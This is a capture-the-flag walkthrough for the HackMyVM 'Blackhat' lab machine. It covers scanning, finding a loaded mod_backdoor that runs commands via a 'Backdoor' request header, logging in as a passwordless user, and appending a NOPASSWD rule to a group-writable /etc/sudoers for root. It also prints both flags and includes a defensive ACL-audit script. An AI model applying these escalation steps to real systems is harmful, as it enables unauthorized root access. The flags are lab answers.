HackMyVM Blackhat

Information gathering

root@kali:~# arp-scan --localnet -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d8:ab:ac, IPv4: 192.168.100.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1    bc:24:11:b4:12:2d    (Unknown)
192.168.100.2    bc:24:11:a2:5b:a7    (Unknown)
192.168.100.3    00:e0:4f:25:79:40    Cisco Systems, Inc
192.168.100.10    90:09:d0:24:84:21    Synology Incorporated
192.168.100.11    c8:98:28:3e:45:5b    (Unknown)
192.168.100.12    c8:98:28:3e:49:9d    (Unknown)
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd.
192.168.100.53    98:8f:e0:6b:01:94    Huaqin Technology Co.,Ltd. (DUP: 2)
192.168.100.54    08:00:27:c4:74:2a    PCS Systemtechnik GmbH
192.168.100.52    ae:b9:07:ec:8e:76    (Unknown: locally administered)
192.168.100.51    54:48:e6:cb:25:c9    Beijing Xiaomi Mobile Software Co., Ltd

14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.026 seconds (126.36 hosts/sec). 10 responded

Port scan
root@kali:~# nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-05 14:43 EDT
Nmap scan report for 192.168.100.54
Host is up (0.00078s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:C4:74:2A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.40 seconds

Port 80


Directory enumeration
root@kali:~# gobuster dir -x php,txt,html,js -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://192.168.100.54
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.54
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1437]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/phpinfo.php          (Status: 200) [Size: 69344]
/server-status        (Status: 403) [Size: 279]
Progress: 1102795 / 1102800 (100.00%)

There is a phpinfo.php, but nothing useful was found in it at first.


index.html contains a line of markup hidden with display:none:

"check backdoor": it says there is some backdoor, but not where it is.

Fuzzing the web GET parameters turned up nothing.

Finally, searching the phpinfo page for "backdoor" showed that a module named mod_backdoor is loaded.


Looking this module up showed that simply adding a Backdoor: id request header is enough to get command execution.


GetShell


User privilege escalation

I searched for a long time but could not find a privilege-escalation point.

But running linpeas.sh turned up the following:

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
# file: /etc/sudoers
USER   root       r--
user   darkdante  rw-
GROUP  root       r--
mask              rw-
other             ---

darkdante can write the sudoers file, so once we get that user, root is instant.
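As an added example (not part of the original writeup), here is a small Python audit that parses `getfacl -t` tabular output, the layout linpeas printed above, and flags sensitive files where a named ACL entry gives a non-root user or group an effective write bit, honouring the ACL mask. The sample output is constructed and the set of sensitive paths is an assumption.

```python
import re

# Constructed sample in `getfacl -t` (tabular) layout, as linpeas printed it above:
# the real /etc/sudoers entry, plus an entry whose mask strips the write bit.
SAMPLE_GETFACL = """\
# file: /etc/sudoers
USER   root       r--
user   darkdante  rw-
GROUP  root       r--
mask              rw-
other             ---

# file: /etc/crontab
USER   root       rw-
user   backup     rw-
GROUP  root       r--
mask              r--
other             r--
"""

# Assumed list of files where a non-root write ACL is a direct path to root.
SENSITIVE = {"/etc/sudoers", "/etc/passwd", "/etc/shadow", "/etc/crontab"}

def parse_tabular_acls(text):
    """Map each '# file:' path to its named user/group entries and its mask.
    Lower-case user/group rows are extended (named) entries; the upper-case
    USER/GROUP rows are the owner and owning group and are not ACL extras."""
    acls, cur = {}, None
    for line in text.splitlines():
        if line.startswith("# file:"):
            cur = line.split(":", 1)[1].strip()
            acls[cur] = {"entries": [], "mask": "rwx"}
        elif cur and (m := re.match(r"^(user|group)\s+(\S+)\s+([rwx-]{3})$", line)):
            acls[cur]["entries"].append((m.group(1), m.group(2), m.group(3)))
        elif cur and (m := re.match(r"^mask\s+([rwx-]{3})$", line)):
            acls[cur]["mask"] = m.group(1)
    return acls

def find_writable_by_non_root(text, sensitive=SENSITIVE):
    """Return (path, kind, name, effective_perms) for sensitive files whose
    named ACL entries give a non-root user or group an effective write bit."""
    findings = []
    for path, acl in parse_tabular_acls(text).items():
        if path not in sensitive:
            continue
        for kind, name, perms in acl["entries"]:
            # Named entries are limited by the mask: a bit counts only if set in both.
            eff = "".join(p if p == q else "-" for p, q in zip(perms, acl["mask"]))
            if "w" in eff and name != "root":
                findings.append((path, kind, name, eff))
    return findings
```

Run against real hosts with `getfacl -t -s -R /etc 2>/dev/null` piped into `find_writable_by_non_root`; the crontab entry in the sample is deliberately masked to r-- and is therefore not reported.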

With no privilege-escalation point anywhere, the only remaining option is a weak password.

It turned out the user has no password at all, and I logged straight in...

UserFlag
darkdante@blackhat:~$ cat user.txt
89fac491dc9bdc5fc4e3595dd396fb11

Root privilege escalation

linpeas just showed that sudoers is writable, so write to it directly:

darkdante@blackhat:~$ ls -al /etc/sudoers
-r--rw----+ 1 root root 669 Nov 19  2022 /etc/sudoers
echo 'darkdante ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
darkdante@blackhat:~$ sudo -l
Matching Defaults entries for darkdante on blackhat:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User darkdante may run the following commands on blackhat:
    (ALL) NOPASSWD: ALL

darkdante@blackhat:~$ sudo bash
root@blackhat:/home/darkdante# id
uid=0(root) gid=0(root) groups=0(root)
root@blackhat:/home/darkdante#

And that's it.

RootFlag
root@blackhat:~# cat root.txt
8cc6110bc1a0607015c354a459468442